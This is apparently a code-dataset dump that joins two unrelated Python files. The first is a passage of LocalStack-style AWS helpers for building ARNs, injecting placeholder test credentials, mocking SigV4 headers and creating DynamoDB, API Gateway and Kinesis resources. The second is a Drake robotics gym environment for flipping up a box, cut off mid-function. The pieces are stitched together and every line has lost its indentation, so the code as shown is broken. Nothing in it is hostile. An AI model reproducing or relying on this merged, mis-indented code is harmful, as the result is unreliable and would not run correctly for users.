regex = r"arn{col}aws{col}([^:%]+){col}([^:%]*){col}{acc}{col}".format(
col=colon_delimiter, acc=acc_id
)
content = re.sub(regex, replace, content)
if not is_str_obj:
response._content = content
response.headers["Content-Length"] = len(response._content)
return response
return content
def inject_test_credentials_into_env(env):
if ENV_ACCESS_KEY not in env and ENV_SECRET_KEY not in env:
env[ENV_ACCESS_KEY] = "test"
env[ENV_SECRET_KEY] = "test"
def inject_region_into_env(env, region):
env["AWS_REGION"] = region
def dynamodb_table_exists(table_name, client=None):
client = client or connect_to_service("dynamodb")
paginator = client.get_paginator("list_tables")
pages = paginator.paginate(PaginationConfig={"PageSize": 100})
for page in pages:
table_names = page["TableNames"]
if to_str(table_name) in table_names:
return True
return False
def sqs_queue_url_for_arn(queue_arn):
if "://" in queue_arn:
return queue_arn
if queue_arn in SQS_ARN_TO_URL_CACHE:
return SQS_ARN_TO_URL_CACHE[queue_arn]
try:
arn = parse_arn(queue_arn)
region_name = arn["region"]
queue_name = arn["resource"]
except InvalidArnException:
region_name = None
queue_name = queue_arn
sqs_client = connect_to_service("sqs", region_name=region_name)
result = sqs_client.get_queue_url(QueueName=queue_name)["QueueUrl"]
SQS_ARN_TO_URL_CACHE[queue_arn] = result
return result
# TODO: remove and merge with sqs_queue_url_for_arn(..) above!!
def get_sqs_queue_url(queue_arn: str) -> str:
return sqs_queue_url_for_arn(queue_arn)
def extract_region_from_auth_header(headers: Dict[str, str], use_default=True) -> str:
auth = headers.get("Authorization") or ""
region = re.sub(r".*Credential=[^/]+/[^/]+/([^/]+)/.*", r"\1", auth)
if region == auth:
region = None
if use_default:
region = region or get_region()
return region
def extract_access_key_id_from_auth_header(headers: Dict[str, str]) -> str:
auth = headers.get("Authorization") or ""
access_id = re.sub(r".*Credential=([^/]+)/[^/]+/[^/]+/.*", r"\1", auth)
if access_id == auth:
access_id = None
return access_id
# TODO: extract ARN utils into separate file!
_arn_parser = ArnParser()
class ArnData(TypedDict):
partition: str
service: str
region: str
account: str
resource: str
def parse_arn(arn: str) -> ArnData:
"""
Uses a botocore ArnParser to parse an arn.
:param arn: the arn string to parse
:returns: a dictionary containing the ARN components
:raises InvalidArnException: if the arn is invalid
"""
return _arn_parser.parse_arn(arn)
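# Hedged example (the ARN below is made up): parse_arn() delegates to botocore's
# ArnParser and returns the five components named in ArnData above.
#
#   parse_arn("arn:aws:sqs:us-east-1:000000000000:my-queue")
#   -> {"partition": "aws", "service": "sqs", "region": "us-east-1",
#       "account": "000000000000", "resource": "my-queue"}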
def extract_region_from_arn(arn: str) -> Optional[str]:
try:
return parse_arn(arn).get("region")
except InvalidArnException:
return None
def extract_service_from_arn(arn: str) -> Optional[str]:
try:
return parse_arn(arn).get("service")
except InvalidArnException:
return None
def get_account_id(account_id=None, env=None):
if account_id:
return account_id
env = get_environment(env)
if is_local_env(env):
return os.environ["TEST_AWS_ACCOUNT_ID"]
raise Exception("Unable to determine AWS account ID (%s, %s)" % (account_id, env))
def role_arn(role_name, account_id=None, env=None):
if not role_name:
return role_name
if role_name.startswith("arn:aws:iam::"):
return role_name
env = get_environment(env)
account_id = get_account_id(account_id, env=env)
return "arn:aws:iam::%s:role/%s" % (account_id, role_name)
def policy_arn(policy_name, account_id=None):
if ":policy/" in policy_name:
return policy_name
account_id = account_id or TEST_AWS_ACCOUNT_ID
return "arn:aws:iam::{}:policy/{}".format(account_id, policy_name)
def iam_resource_arn(resource, role=None, env=None):
env = get_environment(env)
if not role:
role = get_iam_role(resource, env=env)
return role_arn(role_name=role, account_id=get_account_id())
def get_iam_role(resource, env=None):
env = get_environment(env)
return "role-%s" % resource
# TODO: remove this (can't statically define secret ARN because it includes a random suffix)
def secretsmanager_secret_arn(secret_id, account_id=None, region_name=None):
if ":" in (secret_id or ""):
return secret_id
pattern = "arn:aws:secretsmanager:%s:%s:secret:%s"
return _resource_arn(secret_id, pattern, account_id=account_id, region_name=region_name)
def cloudformation_stack_arn(stack_name, stack_id=None, account_id=None, region_name=None):
stack_id = stack_id or "id-123"
pattern = "arn:aws:cloudformation:%s:%s:stack/%s/{stack_id}".format(stack_id=stack_id)
return _resource_arn(stack_name, pattern, account_id=account_id, region_name=region_name)
def cf_change_set_arn(change_set_name, change_set_id=None, account_id=None, region_name=None):
change_set_id = change_set_id or "id-456"
pattern = "arn:aws:cloudformation:%s:%s:changeSet/%s/{cs_id}".format(cs_id=change_set_id)
return _resource_arn(change_set_name, pattern, account_id=account_id, region_name=region_name)
def dynamodb_table_arn(table_name, account_id=None, region_name=None):
table_name = table_name.split(":table/")[-1]
pattern = "arn:aws:dynamodb:%s:%s:table/%s"
return _resource_arn(table_name, pattern, account_id=account_id, region_name=region_name)
def dynamodb_stream_arn(table_name, latest_stream_label, account_id=None):
account_id = get_account_id(account_id)
return "arn:aws:dynamodb:%s:%s:table/%s/stream/%s" % (
get_region(),
account_id,
table_name,
latest_stream_label,
)
def cloudwatch_alarm_arn(alarm_name, account_id=None, region_name=None):
pattern = "arn:aws:cloudwatch:%s:%s:alarm:%s"
return _resource_arn(alarm_name, pattern, account_id=account_id, region_name=region_name)
def log_group_arn(group_name, account_id=None, region_name=None):
pattern = "arn:aws:logs:%s:%s:log-group:%s"
return _resource_arn(group_name, pattern, account_id=account_id, region_name=region_name)
def events_rule_arn(rule_name, account_id=None, region_name=None):
pattern = "arn:aws:events:%s:%s:rule/%s"
return _resource_arn(rule_name, pattern, account_id=account_id, region_name=region_name)
def lambda_function_arn(function_name, account_id=None, region_name=None):
return lambda_function_or_layer_arn(
"function", function_name, account_id=account_id, region_name=region_name
)
def lambda_layer_arn(layer_name, version=None, account_id=None):
return lambda_function_or_layer_arn("layer", layer_name, version=None, account_id=account_id)
def lambda_function_or_layer_arn(
type, entity_name, version=None, account_id=None, region_name=None
):
pattern = "arn:aws:lambda:.*:.*:(function|layer):.*"
if re.match(pattern, entity_name):
return entity_name
if ":" in entity_name:
client = connect_to_service("lambda")
entity_name, _, alias = entity_name.rpartition(":")
try:
alias_response = client.get_alias(FunctionName=entity_name, Name=alias)
version = alias_response["FunctionVersion"]
except Exception as e:
msg = "Alias %s of %s not found" % (alias, entity_name)
LOG.info(f"{msg}: {e}")
raise Exception(msg)
account_id = get_account_id(account_id)
region_name = region_name or get_region()
pattern = re.sub(r"\([^\|]+\|.+\)", type, pattern)
result = pattern.replace(".*", "%s") % (region_name, account_id, entity_name)
if version:
result = "%s:%s" % (result, version)
return result
def lambda_function_name(name_or_arn):
if ":" in name_or_arn:
arn = parse_arn(name_or_arn)
if arn["service"] != "lambda":
raise ValueError("arn is not a lambda arn %s" % name_or_arn)
return parse_arn(name_or_arn)["resource"].split(":")[1]
else:
return name_or_arn
def state_machine_arn(name, account_id=None, region_name=None):
pattern = "arn:aws:states:%s:%s:stateMachine:%s"
return _resource_arn(name, pattern, account_id=account_id, region_name=region_name)
def stepfunctions_activity_arn(name, account_id=None, region_name=None):
pattern = "arn:aws:states:%s:%s:activity:%s"
return _resource_arn(name, pattern, account_id=account_id, region_name=region_name)
def fix_arn(arn):
"""Function that attempts to "canonicalize" the given ARN. This includes converting
resource names to ARNs, replacing incorrect regions, account IDs, etc."""
if arn.startswith("arn:aws:lambda"):
parts = arn.split(":")
region = parts[3] if parts[3] in config.VALID_REGIONS else get_region()
return lambda_function_arn(lambda_function_name(arn), region_name=region)
LOG.warning("Unable to fix/canonicalize ARN: %s", arn)
return arn
def cognito_user_pool_arn(user_pool_id, account_id=None, region_name=None):
pattern = "arn:aws:cognito-idp:%s:%s:userpool/%s"
return _resource_arn(user_pool_id, pattern, account_id=account_id, region_name=region_name)
def kinesis_stream_arn(stream_name, account_id=None, region_name=None):
pattern = "arn:aws:kinesis:%s:%s:stream/%s"
return _resource_arn(stream_name, pattern, account_id=account_id, region_name=region_name)
def elasticsearch_domain_arn(domain_name, account_id=None, region_name=None):
pattern = "arn:aws:es:%s:%s:domain/%s"
return _resource_arn(domain_name, pattern, account_id=account_id, region_name=region_name)
def firehose_stream_arn(stream_name, account_id=None, region_name=None):
pattern = "arn:aws:firehose:%s:%s:deliverystream/%s"
return _resource_arn(stream_name, pattern, account_id=account_id, region_name=region_name)
def es_domain_arn(domain_name, account_id=None, region_name=None):
pattern = "arn:aws:es:%s:%s:domain/%s"
return _resource_arn(domain_name, pattern, account_id=account_id, region_name=region_name)
def kms_key_arn(key_id: str, account_id: str = None, region_name: str = None) -> str:
pattern = "arn:aws:kms:%s:%s:key/%s"
return _resource_arn(key_id, pattern, account_id=account_id, region_name=region_name)
def code_signing_arn(code_signing_id: str, account_id: str = None, region_name: str = None) -> str:
pattern = "arn:aws:lambda:%s:%s:code-signing-config:%s"
return _resource_arn(code_signing_id, pattern, account_id=account_id, region_name=region_name)
def ssm_parameter_arn(param_name: str, account_id: str = None, region_name: str = None) -> str:
pattern = "arn:aws:ssm:%s:%s:parameter/%s"
param_name = param_name.lstrip("/")
return _resource_arn(param_name, pattern, account_id=account_id, region_name=region_name)
def s3_bucket_arn(bucket_name_or_arn: str, account_id=None):
bucket_name = s3_bucket_name(bucket_name_or_arn)
return "arn:aws:s3:::%s" % bucket_name
def s3_bucket_name(bucket_name_or_arn: str) -> str:
return bucket_name_or_arn.split(":::")[-1]
def _resource_arn(name: str, pattern: str, account_id: str = None, region_name: str = None) -> str:
if ":" in name:
return name
account_id = get_account_id(account_id)
region_name = region_name or get_region()
if len(pattern.split("%s")) == 3:
return pattern % (account_id, name)
return pattern % (region_name, account_id, name)
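# Hedged note (added comment): _resource_arn() fills the "%s" placeholders in the
# given pattern. Patterns with two placeholders receive (account_id, name); patterns
# with three receive (region, account_id, name). Example with illustrative values:
#
#   kms_key_arn("my-key", account_id="000000000000", region_name="us-east-1")
#   -> "arn:aws:kms:us-east-1:000000000000:key/my-key"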
def get_events_target_attributes(target):
return dict_utils.pick_attributes(target, EVENT_TARGET_PARAMETERS)
def get_or_create_bucket(bucket_name, s3_client=None):
s3_client = s3_client or connect_to_service("s3")
try:
return s3_client.head_bucket(Bucket=bucket_name)
except Exception:
return s3_client.create_bucket(Bucket=bucket_name)
def create_sqs_queue(queue_name, env=None):
env = get_environment(env)
# queue
conn = connect_to_service("sqs", env=env)
return conn.create_queue(QueueName=queue_name)
def sqs_queue_arn(queue_name, account_id=None, region_name=None):
account_id = get_account_id(account_id)
region_name = region_name or get_region()
queue_name = queue_name.split("/")[-1]
return "arn:aws:sqs:%s:%s:%s" % (region_name, account_id, queue_name)
def apigateway_restapi_arn(api_id, account_id=None, region_name=None):
account_id = get_account_id(account_id)
region_name = region_name or get_region()
return "arn:aws:apigateway:%s:%s:/restapis/%s" % (region_name, account_id, api_id)
def sqs_queue_name(queue_arn):
if ":" in queue_arn:
return parse_arn(queue_arn)["resource"]
else:
return queue_arn
def sns_topic_arn(topic_name, account_id=None):
account_id = get_account_id(account_id)
return "arn:aws:sns:%s:%s:%s" % (get_region(), account_id, topic_name)
def sqs_receive_message(queue_arn):
region_name = extract_region_from_arn(queue_arn)
client = connect_to_service("sqs", region_name=region_name)
queue_url = get_sqs_queue_url(queue_arn)
response = client.receive_message(QueueUrl=queue_url)
return response
def firehose_name(firehose_arn):
return firehose_arn.split("/")[-1]
def kinesis_stream_name(kinesis_arn):
return kinesis_arn.split(":stream/")[-1]
def mock_aws_request_headers(service="dynamodb", region_name=None, access_key=None):
ctype = APPLICATION_AMZ_JSON_1_0
if service == "kinesis":
ctype = APPLICATION_AMZ_JSON_1_1
elif service in ["sns", "sqs"]:
ctype = APPLICATION_X_WWW_FORM_URLENCODED
# TODO: consider adding an internal=False flag, to use INTERNAL_AWS_ACCESS_KEY_ID for internal calls here
access_key = access_key or constants.TEST_AWS_ACCESS_KEY_ID
region_name = region_name or get_region()
headers = {
"Content-Type": ctype,
"Accept-Encoding": "identity",
"X-Amz-Date": "20160623T103251Z",
"Authorization": (
"AWS4-HMAC-SHA256 "
+ "Credential=%s/20160623/%s/%s/aws4_request, "
+ "SignedHeaders=content-type;host;x-amz-date;x-amz-target, Signature=1234"
)
% (access_key, region_name, service),
}
return headers
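# Hedged example (values illustrative): the generated Authorization header follows
# the SigV4 "Credential=<access-key>/<date>/<region>/<service>/aws4_request" layout
# that check_valid_region() and extract_region_from_auth_header() parse, e.g.:
#
#   "AWS4-HMAC-SHA256 Credential=test/20160623/us-east-1/dynamodb/aws4_request, "
#   "SignedHeaders=content-type;host;x-amz-date;x-amz-target, Signature=1234"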
def inject_region_into_auth_headers(region, headers):
auth_header = headers.get("Authorization")
if auth_header:
regex = r"Credential=([^/]+)/([^/]+)/([^/]+)/"
auth_header = re.sub(regex, r"Credential=\1/\2/%s/" % region, auth_header)
headers["Authorization"] = auth_header
def dynamodb_get_item_raw(request):
headers = mock_aws_request_headers()
headers["X-Amz-Target"] = "DynamoDB_20120810.GetItem"
new_item = make_http_request(
url=config.service_url("dynamodb"),
method="POST",
data=json.dumps(request),
headers=headers,
)
new_item = new_item.text
new_item = new_item and json.loads(new_item)
return new_item
def create_dynamodb_table(
table_name,
partition_key,
env=None,
stream_view_type=None,
region_name=None,
client=None,
sleep_after=2,
):
"""Utility method to create a DynamoDB table"""
dynamodb = client or connect_to_service(
"dynamodb", env=env, client=True, region_name=region_name
)
stream_spec = {"StreamEnabled": False}
key_schema = [{"AttributeName": partition_key, "KeyType": "HASH"}]
attr_defs = [{"AttributeName": partition_key, "AttributeType": "S"}]
if stream_view_type is not None:
stream_spec = {"StreamEnabled": True, "StreamViewType": stream_view_type}
table = None
try:
table = dynamodb.create_table(
TableName=table_name,
KeySchema=key_schema,
AttributeDefinitions=attr_defs,
ProvisionedThroughput={"ReadCapacityUnits": 10, "WriteCapacityUnits": 10},
StreamSpecification=stream_spec,
)
except Exception as e:
if "ResourceInUseException" in str(e):
# Table already exists -> return table reference
return connect_to_resource("dynamodb", env=env, region_name=region_name).Table(
table_name
)
if "AccessDeniedException" in str(e):
raise
if sleep_after:
# TODO: do we need this?
time.sleep(sleep_after)
return table
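# Hedged usage sketch (table and key names are made up): create a table keyed on
# "id" with a NEW_IMAGE stream; if the table already exists, the helper returns a
# resource reference to it instead of failing.
#
#   table = create_dynamodb_table("my-table", partition_key="id",
#                                 stream_view_type="NEW_IMAGE")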
def get_apigateway_integration(api_id, method, path, env=None):
apigateway = connect_to_service(service_name="apigateway", client=True, env=env)
resources = apigateway.get_resources(restApiId=api_id, limit=100)
resource_id = None
for r in resources["items"]:
if r["path"] == path:
resource_id = r["id"]
if not resource_id:
raise Exception('Unable to find apigateway integration for path "%s"' % path)
integration = apigateway.get_integration(
restApiId=api_id, resourceId=resource_id, httpMethod=method
)
return integration
def get_apigateway_resource_for_path(api_id, path, parent=None, resources=None):
if resources is None:
apigateway = connect_to_service(service_name="apigateway")
resources = apigateway.get_resources(restApiId=api_id, limit=100)
if not isinstance(path, list):
path = path.split("/")
if not path:
return parent
for resource in resources:
if resource["pathPart"] == path[0] and (not parent or parent["id"] == resource["parentId"]):
return get_apigateway_resource_for_path(
api_id, path[1:], parent=resource, resources=resources
)
return None
def get_apigateway_path_for_resource(
api_id, resource_id, path_suffix="", resources=None, region_name=None
):
if resources is None:
apigateway = connect_to_service(service_name="apigateway", region_name=region_name)
resources = apigateway.get_resources(restApiId=api_id, limit=100)["items"]
target_resource = list(filter(lambda res: res["id"] == resource_id, resources))[0]
path_part = target_resource.get("pathPart", "")
if path_suffix:
if path_part:
path_suffix = "%s/%s" % (path_part, path_suffix)
else:
path_suffix = path_part
parent_id = target_resource.get("parentId")
if not parent_id:
return "/%s" % path_suffix
return get_apigateway_path_for_resource(
api_id,
parent_id,
path_suffix=path_suffix,
resources=resources,
region_name=region_name,
)
def create_api_gateway(
name,
description=None,
resources=None,
stage_name=None,
enabled_api_keys=None,
env=None,
usage_plan_name=None,
region_name=None,
auth_creator_func=None, # function that receives an api_id and returns an authorizer_id
):
if enabled_api_keys is None:
enabled_api_keys = []
client = connect_to_service("apigateway", env=env, region_name=region_name)
resources = resources or []
stage_name = stage_name or "testing"
usage_plan_name = usage_plan_name or "Basic Usage"
description = description or 'Test description for API "%s"' % name
LOG.info('Creating API resources under API Gateway "%s".', name)
api = client.create_rest_api(name=name, description=description)
api_id = api["id"]
auth_id = None
if auth_creator_func:
auth_id = auth_creator_func(api_id)
resources_list = client.get_resources(restApiId=api_id)
root_res_id = resources_list["items"][0]["id"]
# add API resources and methods
for path, methods in resources.items():
# create resources recursively
parent_id = root_res_id
for path_part in path.split("/"):
api_resource = client.create_resource(
restApiId=api_id, parentId=parent_id, pathPart=path_part
)
parent_id = api_resource["id"]
# add methods to the API resource
for method in methods:
kwargs = {"authorizerId": auth_id} if auth_id else {}
client.put_method(
restApiId=api_id,
resourceId=api_resource["id"],
httpMethod=method["httpMethod"],
authorizationType=method.get("authorizationType") or "NONE",
apiKeyRequired=method.get("apiKeyRequired") or False,
requestParameters=method.get("requestParameters") or {},
requestModels=method.get("requestModels") or {},
**kwargs,
)
# create integrations for this API resource/method
integrations = method["integrations"]
create_api_gateway_integrations(
api_id,
api_resource["id"],
method,
integrations,
env=env,
region_name=region_name,
)
# deploy the API gateway
client.create_deployment(restApiId=api_id, stageName=stage_name)
return api
def create_api_gateway_integrations(
api_id, resource_id, method, integrations=None, env=None, region_name=None
):
if integrations is None:
integrations = []
client = connect_to_service("apigateway", env=env, region_name=region_name)
for integration in integrations:
req_templates = integration.get("requestTemplates") or {}
res_templates = integration.get("responseTemplates") or {}
success_code = integration.get("successCode") or "200"
client_error_code = integration.get("clientErrorCode") or "400"
server_error_code = integration.get("serverErrorCode") or "500"
request_parameters = integration.get("requestParameters") or {}
# create integration
client.put_integration(
restApiId=api_id,
resourceId=resource_id,
httpMethod=method["httpMethod"],
integrationHttpMethod=method.get("integrationHttpMethod") or method["httpMethod"],
type=integration["type"],
uri=integration["uri"],
requestTemplates=req_templates,
requestParameters=request_parameters,
)
response_configs = [
{"pattern": "^2.*", "code": success_code, "res_templates": res_templates},
{"pattern": "^4.*", "code": client_error_code, "res_templates": {}},
{"pattern": "^5.*", "code": server_error_code, "res_templates": {}},
]
# create response configs
for response_config in response_configs:
# create integration response
client.put_integration_response(
restApiId=api_id,
resourceId=resource_id,
httpMethod=method["httpMethod"],
statusCode=response_config["code"],
responseTemplates=response_config["res_templates"],
selectionPattern=response_config["pattern"],
)
# create method response
client.put_method_response(
restApiId=api_id,
resourceId=resource_id,
httpMethod=method["httpMethod"],
statusCode=response_config["code"],
)
def apigateway_invocations_arn(lambda_uri, region_name: str = None):
return "arn:aws:apigateway:%s:lambda:path/2015-03-31/functions/%s/invocations" % (
region_name or get_region(),
lambda_uri,
)
def get_opensearch_endpoint(domain_arn: str) -> str:
"""
Get an OpenSearch cluster endpoint by describing the cluster associated with the domain_arn
:param domain_arn: ARN of the cluster.
:returns: cluster endpoint
:raises: ValueError if the domain_arn is malformed
"""
region_name = extract_region_from_arn(domain_arn)
if region_name is None:
raise ValueError("unable to parse region from opensearch domain ARN")
opensearch_client = connect_to_service(service_name="opensearch", region_name=region_name)
domain_name = domain_arn.rpartition("/")[2]
info = opensearch_client.describe_domain(DomainName=domain_name)
base_domain = info["DomainStatus"]["Endpoint"]
endpoint = base_domain if base_domain.startswith("http") else f"https://{base_domain}"
return endpoint
def get_search_db_connection(endpoint: str, region_name: str):
"""
Get a connection to an ElasticSearch or OpenSearch DB
:param endpoint: cluster endpoint
:param region_name: cluster region e.g. us-east-1
"""
from opensearchpy import OpenSearch, RequestsHttpConnection
from requests_aws4auth import AWS4Auth
verify_certs = False
use_ssl = False
# use ssl?
if "https://" in endpoint:
use_ssl = True
# TODO remove this condition once ssl certs are available for .es.localhost.localstack.cloud domains
endpoint_netloc = urlparse(endpoint).netloc
if not re.match(r"^.*(localhost(\.localstack\.cloud)?)(:\d+)?$", endpoint_netloc):
verify_certs = True
LOG.debug("Creating ES client with endpoint %s", endpoint)
if ENV_ACCESS_KEY in os.environ and ENV_SECRET_KEY in os.environ:
access_key = os.environ.get(ENV_ACCESS_KEY)
secret_key = os.environ.get(ENV_SECRET_KEY)
session_token = os.environ.get(ENV_SESSION_TOKEN)
awsauth = AWS4Auth(access_key, secret_key, region_name, "es", session_token=session_token)
connection_class = RequestsHttpConnection
return OpenSearch(
hosts=[endpoint],
verify_certs=verify_certs,
use_ssl=use_ssl,
connection_class=connection_class,
http_auth=awsauth,
)
return OpenSearch(hosts=[endpoint], verify_certs=verify_certs, use_ssl=use_ssl)
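# Hedged usage sketch (the domain ARN and region are illustrative): combine the two
# helpers above to talk to an OpenSearch domain running in LocalStack.
#
#   endpoint = get_opensearch_endpoint(domain_arn)   # ARN from the es/opensearch API
#   client = get_search_db_connection(endpoint, region_name="us-east-1")
#   client.info()                                     # standard opensearch-py call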
def create_kinesis_stream(stream_name, shards=1, env=None, delete=False):
env = get_environment(env)
stream = KinesisStream(id=stream_name, num_shards=shards)
conn = connect_to_service("kinesis", env=env)
stream.connect(conn)
if delete:
run_safe(lambda: stream.destroy(), print_error=False)
stream.create()
# Note: Returning the stream without awaiting its creation (via wait_for()) to avoid API call timeouts/retries.
return stream
def kinesis_get_latest_records(stream_name, shard_id, count=10, env=None):
kinesis = connect_to_service("kinesis", env=env)
result = []
response = kinesis.get_shard_iterator(
StreamName=stream_name, ShardId=shard_id, ShardIteratorType="TRIM_HORIZON"
)
shard_iterator = response["ShardIterator"]
while shard_iterator:
records_response = kinesis.get_records(ShardIterator=shard_iterator)
records = records_response["Records"]
for record in records:
try:
record["Data"] = to_str(record["Data"])
except Exception:
pass
result.extend(records)
shard_iterator = records_response["NextShardIterator"] if records else False
while len(result) > count:
result.pop(0)
return result
def get_stack_details(stack_name, region_name=None):
cloudformation = connect_to_service("cloudformation", region_name=region_name)
stacks = cloudformation.describe_stacks(StackName=stack_name)
for stack in stacks["Stacks"]:
if stack["StackName"] == stack_name:
return stack
def deploy_cf_stack(stack_name, template_body):
cfn = connect_to_service("cloudformation")
cfn.create_stack(StackName=stack_name, TemplateBody=template_body)
# wait for deployment to finish
return await_stack_completion(stack_name)
def await_stack_status(stack_name, expected_statuses, retries=20, sleep=2, region_name=None):
def check_stack():
stack = get_stack_details(stack_name, region_name=region_name)
if stack["StackStatus"] not in expected_statuses:
raise Exception(
'Status "%s" for stack "%s" not in expected list: %s'
% (stack["StackStatus"], stack_name, expected_statuses)
)
return stack
expected_statuses = (
expected_statuses if isinstance(expected_statuses, list) else [expected_statuses]
)
return retry(check_stack, retries, sleep)
def await_stack_completion(stack_name, retries=20, sleep=2, statuses=None, region_name=None):
statuses = statuses or ["CREATE_COMPLETE", "UPDATE_COMPLETE", "DELETE_COMPLETE"]
return await_stack_status(
stack_name, statuses, retries=retries, sleep=sleep, region_name=region_name
)
|
the-stack_106_13057
|
import gym
import numpy as np
from pydrake.all import (
AddMultibodyPlantSceneGraph,
Box,
ConstantVectorSource,
ContactResultsToMeshcat,
ContactResultsToMeshcatParams,
DiagramBuilder,
EventStatus,
FixedOffsetFrame,
InverseDynamicsController,
LeafSystem,
MeshcatVisualizerCpp,
MeshcatVisualizerParams,
MultibodyPlant,
MultibodyPositionToGeometryPose,
Multiplexer,
Parser,
PassThrough,
PlanarJoint,
PrismaticJoint,
RandomGenerator,
Rgba,
RigidTransform,
RotationMatrix,
SceneGraph,
Simulator,
SpatialInertia,
Sphere,
UnitInertia,
Variable,
)
from manipulation.gym import DrakeGymEnv
from manipulation.scenarios import AddShape, SetColor, SetTransparency
from manipulation.utils import FindResource
def AddPlanarBinAndSimpleBox(plant,
mass=1.0,
mu=1.0,
width=0.2,
depth=0.05,
height=0.3):
parser = Parser(plant)
bin = parser.AddModelFromFile(FindResource("models/planar_bin.sdf"))
plant.WeldFrames(
plant.world_frame(), plant.GetFrameByName("bin_base", bin),
RigidTransform(RotationMatrix.MakeZRotation(np.pi / 2.0),
[0, 0, -0.015]))
planar_joint_frame = plant.AddFrame(
FixedOffsetFrame(
"planar_joint_frame", plant.world_frame(),
RigidTransform(RotationMatrix.MakeXRotation(np.pi / 2))))
# TODO(russt): make this a *random* box?
# TODO(russt): move random box to a shared py file.
box_instance = AddShape(plant, Box(width, depth, height), "box", mass, mu)
box_joint = plant.AddJoint(
PlanarJoint("box", planar_joint_frame,
plant.GetFrameByName("box", box_instance)))
box_joint.set_position_limits([-.5, -.1, -np.pi], [.5, .3, np.pi])
box_joint.set_velocity_limits([-2, -2, -2], [2, 2, 2])
box_joint.set_default_translation([0, depth / 2.0])
return box_instance
def AddPointFinger(plant):
finger = AddShape(plant, Sphere(0.01), "finger", color=[.9, .5, .5, 1.0])
false_body1 = plant.AddRigidBody(
"false_body1", finger, SpatialInertia(0, [0, 0, 0],
UnitInertia(0, 0, 0)))
finger_x = plant.AddJoint(
PrismaticJoint("finger_x", plant.world_frame(),
plant.GetFrameByName("false_body1"), [1, 0, 0], -.3, .3))
finger_x.set_position_limits([-.5], [.5])
finger_x.set_velocity_limits([-2], [2])
plant.AddJointActuator("finger_x", finger_x)
finger_z = plant.AddJoint(
PrismaticJoint("finger_z", plant.GetFrameByName("false_body1"),
plant.GetFrameByName("finger"), [0, 0, 1], 0.0, 0.5))
finger_z.set_default_translation(0.25)
finger_z.set_position_limits([-.1], [.3])
finger_z.set_velocity_limits([-2], [2])
plant.AddJointActuator("finger_z", finger_z)
return finger
def make_box_flipup(generator,
observations="state",
meshcat=None,
time_limit=10):
builder = DiagramBuilder()
plant, scene_graph = AddMultibodyPlantSceneGraph(builder, time_step=0.001)
# TODO(russt): randomize parameters.
box = AddPlanarBinAndSimpleBox(plant)
finger = AddPointFinger(plant)
plant.Finalize()
plant.set_name("plant")
SetTransparency(scene_graph, alpha=0.5, source_id=plant.get_source_id())
controller_plant = MultibodyPlant(time_step=0.005)
AddPointFinger(controller_plant)
if meshcat:
MeshcatVisualizerCpp.AddToBuilder(builder, scene_graph, meshcat)
meshcat.Set2dRenderMode(xmin=-.35, xmax=.35, ymin=-0.1, ymax=0.3)
ContactResultsToMeshcat.AddToBuilder(
builder, plant, meshcat,
ContactResultsToMeshcatParams(radius=0.005, newtons_per_meter=40.0))
# Use the controller plant to visualize the set point geometry.
controller_scene_graph = builder.AddSystem(SceneGraph())
controller_plant.RegisterAsSourceForSceneGraph(controller_scene_graph)
SetColor(controller_scene_graph,
color=[1.0, 165.0 / 255, 0.0, 1.0],
source_id=controller_plant.get_source_id())
controller_vis = MeshcatVisualizerCpp.AddToBuilder(
builder, controller_scene_graph, meshcat,
MeshcatVisualizerParams(prefix="controller"))
controller_vis.set_name("controller meshcat")
controller_plant.Finalize()
# Stiffness control. (For a point finger with unit mass, the
# InverseDynamicsController is identical)
N = controller_plant.num_positions()
kp = [100] * N
ki = [1] * N
kd = [2 * np.sqrt(kp[0])] * N
controller = builder.AddSystem(
InverseDynamicsController(controller_plant, kp, ki, kd, False))
builder.Connect(plant.get_state_output_port(finger),
controller.get_input_port_estimated_state())
actions = builder.AddSystem(PassThrough(N))
positions_to_state = builder.AddSystem(Multiplexer([N, N]))
builder.Connect(actions.get_output_port(),
positions_to_state.get_input_port(0))
zeros = builder.AddSystem(ConstantVectorSource([0] * N))
builder.Connect(zeros.get_output_port(),
positions_to_state.get_input_port(1))
builder.Connect(positions_to_state.get_output_port(),
controller.get_input_port_desired_state())
builder.Connect(controller.get_output_port(),
plant.get_actuation_input_port())
if meshcat:
positions_to_poses = builder.AddSystem(
MultibodyPositionToGeometryPose(controller_plant))
builder.Connect(
positions_to_poses.get_output_port(),
controller_scene_graph.get_source_pose_port(
controller_plant.get_source_id()))
builder.ExportInput(actions.get_input_port(), "actions")
if observations == "state":
builder.ExportOutput(plant.get_state_output_port(), "observations")
# TODO(russt): Add 'time', and 'keypoints'
else:
raise ValueError("observations must be one of ['state']")
class RewardSystem(LeafSystem):
def __init__(self):
LeafSystem.__init__(self)
self.DeclareVectorInputPort("box_state", 6)
self.DeclareVectorInputPort("finger_state", 4)
self.DeclareVectorInputPort("actions", 2)
self.DeclareVectorOutputPort("reward", 1, self.CalcReward)
def CalcReward(self, context, output):
box_state = self.get_input_port(0).Eval(context)
finger_state = self.get_input_port(1).Eval(context)
actions = self.get_input_port(2).Eval(context)
angle_from_vertical = (box_state[2] % np.pi) - np.pi / 2
cost = 2 * angle_from_vertical**2 # box angle
cost += 0.1 * box_state[5]**2 # box velocity
effort = actions - finger_state[:2]
cost += 0.1 * effort.dot(effort) # effort
# finger velocity
cost += 0.1 * finger_state[2:].dot(finger_state[2:])
# Add 10 to make rewards positive (to avoid rewarding simulator
# crashes).
output[0] = 10 - cost
reward = builder.AddSystem(RewardSystem())
builder.Connect(plant.get_state_output_port(box), reward.get_input_port(0))
builder.Connect(plant.get_state_output_port(finger),
reward.get_input_port(1))
builder.Connect(actions.get_output_port(), reward.get_input_port(2))
builder.ExportOutput(reward.get_output_port(), "reward")
# Set random state distributions.
uniform_random = Variable(name="uniform_random",
type=Variable.Type.RANDOM_UNIFORM)
box_joint = plant.GetJointByName("box")
x, y = box_joint.get_default_translation()
box_joint.set_random_pose_distribution([.2 * uniform_random - .1 + x, y], 0)
diagram = builder.Build()
simulator = Simulator(diagram)
# Termination conditions:
def monitor(context):
if context.get_time() > time_limit:
return EventStatus.ReachedTermination(diagram, "time limit")
return EventStatus.Succeeded()
simulator.set_monitor(monitor)
return simulator
def BoxFlipUpEnv(observations="state", meshcat=None, time_limit=10):
simulator = make_box_flipup(RandomGenerator(),
observations,
meshcat=meshcat,
time_limit=time_limit)
action_space = gym.spaces.Box(low=np.array([-.5, -0.1], dtype="float32"),
high=np.array([.5, 0.6], dtype="float32"))
plant = simulator.get_system().GetSubsystemByName("plant")
if observations == "state":
low = np.concatenate(
(plant.GetPositionLowerLimits(), plant.GetVelocityLowerLimits()))
high = np.concatenate(
